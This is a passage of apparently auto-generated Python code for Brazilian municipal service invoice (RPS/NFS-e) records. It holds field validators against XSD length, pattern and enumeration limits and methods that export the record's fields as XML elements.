self.validate_tpAliquota(self.AliquotaAtividade)
self.TipoRecolhimento = TipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
self.MunicipioPrestacao = MunicipioPrestacao
self.validate_tpCodCidade(self.MunicipioPrestacao)
self.MunicipioPrestacaoDescricao = MunicipioPrestacaoDescricao
self.validate_tpCidadeDescricao(self.MunicipioPrestacaoDescricao)
self.Operacao = Operacao
self.validate_tpOperacao(self.Operacao)
self.Tributacao = Tributacao
self.validate_tpTributacao(self.Tributacao)
self.ValorPIS = ValorPIS
self.validate_tpValor(self.ValorPIS)
self.ValorCOFINS = ValorCOFINS
self.validate_tpValor(self.ValorCOFINS)
self.ValorINSS = ValorINSS
self.validate_tpValor(self.ValorINSS)
self.ValorIR = ValorIR
self.validate_tpValor(self.ValorIR)
self.ValorCSLL = ValorCSLL
self.validate_tpValor(self.ValorCSLL)
self.AliquotaPIS = AliquotaPIS
self.validate_tpAliquota(self.AliquotaPIS)
self.AliquotaCOFINS = AliquotaCOFINS
self.validate_tpAliquota(self.AliquotaCOFINS)
self.AliquotaINSS = AliquotaINSS
self.validate_tpAliquota(self.AliquotaINSS)
self.AliquotaIR = AliquotaIR
self.validate_tpAliquota(self.AliquotaIR)
self.AliquotaCSLL = AliquotaCSLL
self.validate_tpAliquota(self.AliquotaCSLL)
self.DescricaoRPS = DescricaoRPS
self.validate_tpDescricaoRPS(self.DescricaoRPS)
self.DDDPrestador = DDDPrestador
self.validate_tpDDDNulo(self.DDDPrestador)
self.TelefonePrestador = TelefonePrestador
self.validate_tpFoneNulo(self.TelefonePrestador)
self.DDDTomador = DDDTomador
self.validate_tpDDDNulo(self.DDDTomador)
self.TelefoneTomador = TelefoneTomador
self.validate_tpFoneNulo(self.TelefoneTomador)
self.MotCancelamento = MotCancelamento
self.validate_tpMotCancelamento(self.MotCancelamento)
self.CPFCNPJIntermediario = CPFCNPJIntermediario
self.validate_tpCPFCNPJnulo(self.CPFCNPJIntermediario)
self.Deducoes = Deducoes
self.Itens = Itens
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpRPS.subclass:
return tpRPS.subclass(*args_, **kwargs_)
else:
return tpRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpAssinatura(self, value):
# Validate type tpAssinatura, a restriction on xs:base64Binary.
if value is not None and Validate_simpletypes_:
pass
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpRazaoSocialPrestador(self, value):
# Validate type tpRazaoSocialPrestador, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocialPrestador' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocialPrestador' % {"value" : value.encode("utf-8")} )
def validate_tpTipoRPS(self, value):
# Validate type tpTipoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['RPS']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRPS' % {"value" : value.encode("utf-8")} )
if len(value) > 20:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpSituacaoRPS(self, value):
# Validate type tpSituacaoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['N', 'C']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSituacaoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPSSubstituido(self, value):
# Validate type tpSerieRPSSubstituido, a restriction on None.
pass
def validate_tpNumeroComZero(self, value):
# Validate type tpNumeroComZero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumeroComZero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumeroComZero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumeroComZero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumeroComZero_patterns_, ))
validate_tpNumeroComZero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpDataNulo(self, value):
# Validate type tpDataNulo, a restriction on None.
pass
def validate_tpSeriePrestacao(self, value):
# Validate type tpSeriePrestacao, a restriction on xs:byte.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpSeriePrestacao' % {"value" : value} )
if value > 99:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpSeriePrestacao' % {"value" : value} )
def validate_tpInscricaoMunicipalNulo(self, value):
# Validate type tpInscricaoMunicipalNulo, a restriction on None.
pass
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def validate_tpDocTomadorEstrangeiro(self, value):
# Validate type tpDocTomadorEstrangeiro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 20:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDocTomadorEstrangeiro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDocTomadorEstrangeiro' % {"value" : value.encode("utf-8")} )
def validate_tpTipoLogradouro(self, value):
# Validate type tpTipoLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpLogradouro(self, value):
# Validate type tpLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpNumeroEndereco(self, value):
# Validate type tpNumeroEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 9:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpComplementoEndereco(self, value):
# Validate type tpComplementoEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpTipoBairro(self, value):
# Validate type tpTipoBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
def validate_tpBairro(self, value):
# Validate type tpBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
def validate_tpCodCidade(self, value):
# Validate type tpCodCidade, a restriction on xs:unsignedInt.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpCodCidade' % {"value" : value} )
def validate_tpCidadeTomadorDescricao(self, value):
# Validate type tpCidadeTomadorDescricao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCidadeTomadorDescricao' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCidadeTomadorDescricao' % {"value" : value.encode("utf-8")} )
def validate_tpCEP(self, value):
# Validate type tpCEP, a restriction on xs:int.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCEP_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCEP_patterns_, ))
validate_tpCEP_patterns_ = [['^[0-9]{0,8}$']]
def validate_tpEmail(self, value):
# Validate type tpEmail, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 60:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpEmail' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpEmail' % {"value" : value.encode("utf-8")} )
def validate_tpCodigoAtividade(self, value):
# Validate type tpCodigoAtividade, a restriction on xs:int.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCodigoAtividade_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCodigoAtividade_patterns_, ))
validate_tpCodigoAtividade_patterns_ = [['^[0-9]{9}$']]
def validate_tpAliquota(self, value):
# Validate type tpAliquota, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpAliquota' % {"value" : value} )
if len(str(value)) >= 6:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpAliquota' % {"value" : value} )
def validate_tpTipoRecolhimento(self, value):
# Validate type tpTipoRecolhimento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'R']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRecolhimento' % {"value" : value.encode("utf-8")} )
def validate_tpCidadeDescricao(self, value):
# Validate type tpCidadeDescricao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCidadeDescricao' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCidadeDescricao' % {"value" : value.encode("utf-8")} )
def validate_tpOperacao(self, value):
# Validate type tpOperacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'B', 'C', 'D', 'J']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpOperacao' % {"value" : value.encode("utf-8")} )
def validate_tpTributacao(self, value):
# Validate type tpTributacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['C', 'F', 'K', 'E', 'T', 'H', 'G', 'N', 'M']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTributacao' % {"value" : value.encode("utf-8")} )
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpValor_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpDescricaoRPS(self, value):
# Validate type tpDescricaoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 1500:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDescricaoRPS' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDescricaoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpDDDNulo(self, value):
# Validate type tpDDDNulo, a restriction on None.
pass
def validate_tpFoneNulo(self, value):
# Validate type tpFoneNulo, a restriction on None.
pass
def validate_tpMotCancelamento(self, value):
# Validate type tpMotCancelamento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 80:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
def validate_tpCPFCNPJnulo(self, value):
# Validate type tpCPFCNPJnulo, a restriction on None.
pass
def hasContent_(self):
if (
self.Assinatura is not None or
self.InscricaoMunicipalPrestador is not None or
self.RazaoSocialPrestador is not None or
self.TipoRPS is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None or
self.DataEmissaoRPS is not None or
self.SituacaoRPS is not None or
self.SerieRPSSubstituido is not None or
self.NumeroRPSSubstituido is not None or
self.NumeroNFSeSubstituida is not None or
self.DataEmissaoNFSeSubstituida is not None or
self.SeriePrestacao is not None or
self.InscricaoMunicipalTomador is not None or
self.CPFCNPJTomador is not None or
self.RazaoSocialTomador is not None or
self.DocTomadorEstrangeiro is not None or
self.TipoLogradouroTomador is not None or
self.LogradouroTomador is not None or
self.NumeroEnderecoTomador is not None or
self.ComplementoEnderecoTomador is not None or
self.TipoBairroTomador is not None or
self.BairroTomador is not None or
self.CidadeTomador is not None or
self.CidadeTomadorDescricao is not None or
self.CEPTomador is not None or
self.EmailTomador is not None or
self.CodigoAtividade is not None or
self.AliquotaAtividade is not None or
self.TipoRecolhimento is not None or
self.MunicipioPrestacao is not None or
self.MunicipioPrestacaoDescricao is not None or
self.Operacao is not None or
self.Tributacao is not None or
self.ValorPIS is not None or
self.ValorCOFINS is not None or
self.ValorINSS is not None or
self.ValorIR is not None or
self.ValorCSLL is not None or
self.AliquotaPIS is not None or
self.AliquotaCOFINS is not None or
self.AliquotaINSS is not None or
self.AliquotaIR is not None or
self.AliquotaCSLL is not None or
self.DescricaoRPS is not None or
self.DDDPrestador is not None or
self.TelefonePrestador is not None or
self.DDDTomador is not None or
self.TelefoneTomador is not None or
self.MotCancelamento is not None or
self.CPFCNPJIntermediario is not None or
self.Deducoes is not None or
self.Itens is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpRPS'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Assinatura is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Assinatura>%s</ns1:Assinatura>%s' % (self.gds_format_base64(self.Assinatura, input_name='Assinatura'), eol_))
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
if self.TipoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRPS>%s</ns1:TipoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRPS), input_name='TipoRPS')), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.DataEmissaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoRPS>%s</ns1:DataEmissaoRPS>%s' % (self.gds_format_datetime(self.DataEmissaoRPS, input_name='DataEmissaoRPS'), eol_))
if self.SituacaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SituacaoRPS>%s</ns1:SituacaoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SituacaoRPS), input_name='SituacaoRPS')), eol_))
if self.SerieRPSSubstituido is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPSSubstituido>%s</ns1:SerieRPSSubstituido>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPSSubstituido), input_name='SerieRPSSubstituido')), eol_))
if self.NumeroRPSSubstituido is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPSSubstituido>%s</ns1:NumeroRPSSubstituido>%s' % (self.gds_format_integer(self.NumeroRPSSubstituido, input_name='NumeroRPSSubstituido'), eol_))
if self.NumeroNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFSeSubstituida>%s</ns1:NumeroNFSeSubstituida>%s' % (self.gds_format_integer(self.NumeroNFSeSubstituida, input_name='NumeroNFSeSubstituida'), eol_))
if self.DataEmissaoNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoNFSeSubstituida>%s</ns1:DataEmissaoNFSeSubstituida>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DataEmissaoNFSeSubstituida), input_name='DataEmissaoNFSeSubstituida')), eol_))
if self.SeriePrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SeriePrestacao>%s</ns1:SeriePrestacao>%s' % (self.gds_format_integer(self.SeriePrestacao, input_name='SeriePrestacao'), eol_))
if self.InscricaoMunicipalTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalTomador>%s</ns1:InscricaoMunicipalTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.InscricaoMunicipalTomador), input_name='InscricaoMunicipalTomador')), eol_))
if self.CPFCNPJTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJTomador>%s</ns1:CPFCNPJTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJTomador), input_name='CPFCNPJTomador')), eol_))
if self.RazaoSocialTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialTomador>%s</ns1:RazaoSocialTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialTomador), input_name='RazaoSocialTomador')), eol_))
if self.DocTomadorEstrangeiro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DocTomadorEstrangeiro>%s</ns1:DocTomadorEstrangeiro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DocTomadorEstrangeiro), input_name='DocTomadorEstrangeiro')), eol_))
if self.TipoLogradouroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoLogradouroTomador>%s</ns1:TipoLogradouroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoLogradouroTomador), input_name='TipoLogradouroTomador')), eol_))
if self.LogradouroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:LogradouroTomador>%s</ns1:LogradouroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.LogradouroTomador), input_name='LogradouroTomador')), eol_))
if self.NumeroEnderecoTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroEnderecoTomador>%s</ns1:NumeroEnderecoTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NumeroEnderecoTomador), input_name='NumeroEnderecoTomador')), eol_))
if self.ComplementoEnderecoTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ComplementoEnderecoTomador>%s</ns1:ComplementoEnderecoTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ComplementoEnderecoTomador), input_name='ComplementoEnderecoTomador')), eol_))
if self.TipoBairroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoBairroTomador>%s</ns1:TipoBairroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoBairroTomador), input_name='TipoBairroTomador')), eol_))
if self.BairroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:BairroTomador>%s</ns1:BairroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.BairroTomador), input_name='BairroTomador')), eol_))
if self.CidadeTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CidadeTomador>%s</ns1:CidadeTomador>%s' % (self.gds_format_integer(self.CidadeTomador, input_name='CidadeTomador'), eol_))
if self.CidadeTomadorDescricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CidadeTomadorDescricao>%s</ns1:CidadeTomadorDescricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CidadeTomadorDescricao), input_name='CidadeTomadorDescricao')), eol_))
if self.CEPTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CEPTomador>%s</ns1:CEPTomador>%s' % (self.gds_format_integer(self.CEPTomador, input_name='CEPTomador'), eol_))
if self.EmailTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:EmailTomador>%s</ns1:EmailTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.EmailTomador), input_name='EmailTomador')), eol_))
if self.CodigoAtividade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoAtividade>%s</ns1:CodigoAtividade>%s' % (self.gds_format_integer(self.CodigoAtividade, input_name='CodigoAtividade'), eol_))
if self.AliquotaAtividade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaAtividade>%s</ns1:AliquotaAtividade>%s' % (self.gds_format_float(self.AliquotaAtividade, input_name='AliquotaAtividade'), eol_))
if self.TipoRecolhimento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRecolhimento>%s</ns1:TipoRecolhimento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRecolhimento), input_name='TipoRecolhimento')), eol_))
if self.MunicipioPrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MunicipioPrestacao>%s</ns1:MunicipioPrestacao>%s' % (self.gds_format_integer(self.MunicipioPrestacao, input_name='MunicipioPrestacao'), eol_))
if self.MunicipioPrestacaoDescricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MunicipioPrestacaoDescricao>%s</ns1:MunicipioPrestacaoDescricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MunicipioPrestacaoDescricao), input_name='MunicipioPrestacaoDescricao')), eol_))
if self.Operacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Operacao>%s</ns1:Operacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Operacao), input_name='Operacao')), eol_))
if self.Tributacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Tributacao>%s</ns1:Tributacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Tributacao), input_name='Tributacao')), eol_))
if self.ValorPIS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorPIS>%s</ns1:ValorPIS>%s' % (self.gds_format_float(self.ValorPIS, input_name='ValorPIS'), eol_))
if self.ValorCOFINS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorCOFINS>%s</ns1:ValorCOFINS>%s' % (self.gds_format_float(self.ValorCOFINS, input_name='ValorCOFINS'), eol_))
if self.ValorINSS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorINSS>%s</ns1:ValorINSS>%s' % (self.gds_format_float(self.ValorINSS, input_name='ValorINSS'), eol_))
if self.ValorIR is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorIR>%s</ns1:ValorIR>%s' % (self.gds_format_float(self.ValorIR, input_name='ValorIR'), eol_))
if self.ValorCSLL is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorCSLL>%s</ns1:ValorCSLL>%s' % (self.gds_format_float(self.ValorCSLL, input_name='ValorCSLL'), eol_))
if self.AliquotaPIS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaPIS>%s</ns1:AliquotaPIS>%s' % (self.gds_format_float(self.AliquotaPIS, input_name='AliquotaPIS'), eol_))
if self.AliquotaCOFINS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaCOFINS>%s</ns1:AliquotaCOFINS>%s' % (self.gds_format_float(self.AliquotaCOFINS, input_name='AliquotaCOFINS'), eol_))
if self.AliquotaINSS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaINSS>%s</ns1:AliquotaINSS>%s' % (self.gds_format_float(self.AliquotaINSS, input_name='AliquotaINSS'), eol_))
if self.AliquotaIR is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaIR>%s</ns1:AliquotaIR>%s' % (self.gds_format_float(self.AliquotaIR, input_name='AliquotaIR'), eol_))
if self.AliquotaCSLL is not None:
showIndent(outfile, level, pretty_print)
